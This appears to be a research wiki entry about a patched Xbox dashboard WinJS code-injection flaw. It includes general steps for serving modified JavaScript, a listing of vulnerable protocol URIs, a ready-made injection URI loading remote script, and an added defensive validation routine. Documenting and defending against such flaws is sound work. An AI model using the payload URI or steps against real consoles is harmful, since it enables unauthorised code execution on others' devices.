
MS Xdash WinJS injection

Metadata

Release date: 22.12.2019
Author: TitleOS
Classification: RCE / WinJS code injection
Patched: yes
Patch date: ~2019/2020
First patched system version: ?
Source: https://blog.titleos.dev/xploring-xbox / https://github.com/TitleOS/ToastMyConsole
Download: XboxOneResearch GIT

Info

The Xbox messaging system supports the embedding of protocols for one-click redemption of service messages containing 5x5 game codes, viewing shared images, club invites, etc. By crafting my own service message whilst chaining another vulnerability that allowed for remote custom WinJS execution (i.e. ToastMyConsole), I was able to construct a message allowing remote code execution on any console, given the stipulation of the user interacting and clicking on the button.

The worm-like behaviour (spreading via service messages) has been patched on the XBL server side and is no longer possible.

The local code injection can still work on compatible Xbox OS versions, provided a method for intercepting / modifying the console's network traffic is available.

In early versions, the vulnerable applications did not verify the scheme or the hostname of the URL given in the payload link, so the payload could be routed to a non-HTTPS URL or to a different hostname.

The injected JS gets loaded in the background.

Prerequisites

  • Method to intercept / route HTTP(S) traffic.

Instructions

No exact instructions are provided, as the URLs to intercept / reroute and their content vary between OS versions.

Basic info:

  1. Host a plain-HTTP webserver (or HTTPS, if you have a valid / validly-spoofed certificate) somewhere reachable from the Xbox.
  2. Download the original JavaScript and store it on the webserver.
  3. Modify the JavaScript to give some indication of a successful loading / injection. Make sure to keep the basic structure intact (the init function(s) are still found, etc.).
  4. Rewrite the URL payload to point to your custom JS.
  5. Open the URI (e.g. from an href link) in MS Edge and see if it auto-switches to XDash.

Vulnerable protocol URIs:

  • ms-xdash:// (Xdash launcher)
  • ms-oobe:// (Xbox Assist / Welcome app)

Already modified

  • ToastMyConsole: ms-xdash://?payload=https://www.toastmyconsole.com/scripts/consoleinfo.js&state=""&webview=false

Original

  • ms-xdash://?payload=https://mediaexp-programming.xboxlive.com/Beacon/int/assets/js/beacon.app.min.js

NOTE: The respective app(s) can be found in X:\Apps\. Check the AppxManifest for their uap:Protocol.
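The missing check described under Info was that the receiving app accepted any scheme and hostname in the `payload` parameter. The following added example (not from the original page, TitleOS or the Xbox OS code) shows the kind of validation a protocol handler should apply before loading such a script: parse the `ms-xdash://` / `ms-oobe://` URI, require an HTTPS payload URL and reject any host outside an allow-list. The allow-list (`xboxlive.com` and its subdomains) is an assumption derived from the one legitimate URL on this page, not a known list from the real app.

```javascript
// Added example: validate the payload parameter of an Xdash-style protocol URI.
// ALLOWED_PAYLOAD_HOSTS is an assumption, derived from the original beacon URL.
const ALLOWED_SCHEMES = ["ms-xdash:", "ms-oobe:"];
const ALLOWED_PAYLOAD_HOSTS = ["xboxlive.com"]; // exact host or any subdomain

// Parse "ms-xdash://?a=b&c=d" into { scheme, params }. Parsed by hand because
// custom schemes are treated as opaque by some URL parsers.
function parseXdashUri(uri) {
  const m = /^([a-z-]+:)\/\/\??(.*)$/i.exec(uri);
  if (!m) return null;
  const params = new Map();
  for (const pair of m[2].split("&")) {
    if (!pair) continue;
    const i = pair.indexOf("=");
    const k = i < 0 ? pair : pair.slice(0, i);
    const v = i < 0 ? "" : pair.slice(i + 1);
    try { params.set(decodeURIComponent(k), decodeURIComponent(v)); }
    catch { return null; } // malformed percent-encoding: treat the URI as invalid
  }
  return { scheme: m[1].toLowerCase(), params };
}

// Suffix match on a label boundary, so "xboxlive.com.example" does not pass.
function hostAllowed(hostname) {
  const h = hostname.toLowerCase();
  return ALLOWED_PAYLOAD_HOSTS.some(d => h === d || h.endsWith("." + d));
}

// Returns { ok: true, payload } when the script may be loaded, else { ok: false, reason }.
function checkPayloadUri(uri) {
  const parsed = parseXdashUri(uri);
  if (!parsed) return { ok: false, reason: "unparseable URI" };
  if (!ALLOWED_SCHEMES.includes(parsed.scheme)) return { ok: false, reason: "unexpected scheme " + parsed.scheme };
  const payload = parsed.params.get("payload");
  if (!payload) return { ok: false, reason: "missing payload parameter" };
  let u;
  try { u = new URL(payload); } catch { return { ok: false, reason: "payload is not an absolute URL" }; }
  if (u.protocol !== "https:") return { ok: false, reason: "payload must use https" };
  if (u.username || u.password) return { ok: false, reason: "credentials embedded in payload URL" };
  if (!hostAllowed(u.hostname)) return { ok: false, reason: "host not allow-listed: " + u.hostname };
  return { ok: true, payload: u.href };
}
```

Run against the two URIs listed above, the original beacon URL passes and the ToastMyConsole one is rejected on hostname; a plain-HTTP copy of the original is rejected on scheme.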

Authors: tuxuser